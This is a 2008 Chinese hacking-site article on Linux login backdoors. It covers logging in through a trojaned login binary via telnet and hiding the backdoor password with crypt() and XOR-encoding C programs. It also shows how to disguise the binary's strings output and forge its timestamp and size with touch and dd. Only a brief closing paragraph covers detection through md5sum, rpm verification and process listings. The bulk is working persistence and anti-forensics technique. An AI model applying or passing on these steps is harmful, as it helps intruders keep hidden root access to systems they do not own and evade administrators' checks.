当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 浅析Linux系统后门技术和实践方法

浅析Linux系统后门技术和实践方法

2008年10月08日 脚本攻防 我要评论
浅析Linux系统后门技术和实践方法 后门简介 入侵者完全控制系统后,为方便下次进入而采用的一种技术。 一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易... 08-10-08
利用后门登录 首先telnet服务是打开的,在自己机器上:
bash$content$nbsp;export display=password
bash$content$nbsp;telnet victim.com
trying xxx.xxx.xxx.xxx...
connected to victim.com (xxx.xxx.xxx.xxx).
escape character is ’^]’.
% _ strings命令 strings命令能够打印出二进制文件中的可显示
字符串,用于刚才的ulogin程序:
bash$content$nbsp;strings ulogin
/lib/ld-linux.so.2
..............
display
/sbin/logins
password
/bin/csh 加密后门密码(1) 1,采用des算法,即crypt( )函数,编写gen.c程序:
#include <unistd.h>
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s <password> <salt>\n", argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
} 加密后门密码(1) 2、编译为gen,执行./gen hack ui,得到的shadow结
果为uivqmwvdriqja。
3、修改后门源程序ulogin.c:
-- 以密文形式的密码代替ulogin.c中define的宏
password值。
-- 如果后门密码正确,直接给出shell:
if (!strcmp(password, crypt(display,password)))
{
system(shell);
exit(1);
}
用strings命令只能看到加密过的密码。 加密后门密码(2) 采用异或(xor)算法
以十六进制方式表示字符串,以达到non-
printable的效果
1、编码程序encode.c如下: 加密后门密码(2) char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a";
char *de(char *str,char *key)
{
int i=0,j=0,len;
len=strlen(key);
while(str[i] != ’\0’) {
str[i]^=key[j];
j ;
if(j==len) j=0;
i ;
}
return str;
}
void display(char *str)
{
int i;
for(i=0;i<strlen(str);i ) printf("\\x%x",str[i]);
printf("\n");
}
main()
{
char gets[100], *ptr;
ptr=gets;
scanf ("%s",ptr);
de(ptr,magic);display(ptr);
} 加密后门密码(2) 2、编译程序encode,依次执行得到关键字符
串与magic串异或后的结果,例如原始login的文
件名/sbin/xlogin,经过异或后为:
\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb
3、在后门源代码中这样定义:
char
login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x
13\xb";
然后插入异或函数char *de()结合同一magic
串,就能判断出正确的后门密码。
用strings命令看不到密码、路径等字符串了。 最后的修饰(1) 使后门程序ulogin的strings输出类似于正
常login的strings输出,做法为:
在ulogin.c代码中增加一个字符串数组
char strings[] ="";,在引号中填入正常
login程序的strings输出结果。
以假乱真,增加迷惑性。 最后的修饰(2) 调整后门程序的文件日期、大小等属性:
1、日期
# ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 feb 11 1998
/sbin/xlogin
# touch -t 199802110000 ulogin
# _ 最后的修饰(2) 2、调整大小
# ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 feb 11 1998 ulogin
-r-sr-xr-x root root 19300 feb 11 1998 /sbin/xlogin
# bc
19300-7542
11758
# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1 0 records in
1 0 records out
11758 bytes transferred in 0.000379 secs (31016746
bytes/sec)
# cat /tmp/t >> ulogin login后门的检测 使用命令md5sum对现有/bin/login文件作
校验,与以前的值作比较。
使用red hat linux的rpm校验:
# rpm -v util-linux
在入侵者已经利用后门登录的情况下,
who是看不到用户的,查看系统进程,查
找login -h xxx.xxx.xxx.xxx的字样。
(0)

相关文章:

  • 记一次曲折的php入侵

    记一次曲折的php入侵

    记一次曲折的php入侵 闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习于是就判断是否存在注入点。and 1=1... [阅读全文]
  • 追踪入侵JSP网站服务器

    追踪入侵JSP网站服务器

    追踪入侵JSP网站服务器 在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站... [阅读全文]
  • 实例讲解木马的分析方法

    实例讲解木马的分析方法

    实例讲解木马的分析方法 以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生&r... [阅读全文]
  • 利用SA权限入侵Mssql主机后的感悟

    利用SA权限入侵Mssql主机后的感悟

    利用SA权限入侵Mssql主机后的感悟 想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得... [阅读全文]
  • Cmd模式下的入侵技术大全

    Cmd模式下的入侵技术大全

    Cmd模式下的入侵技术大全 前言 Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制... [阅读全文]
  • 强化远程终端3389入侵

    强化远程终端3389入侵

    强化远程终端3389入侵 很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时,会发现在连接对方机器后,无法像内网计算机那样可以互传文件,这在很大程度上使... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com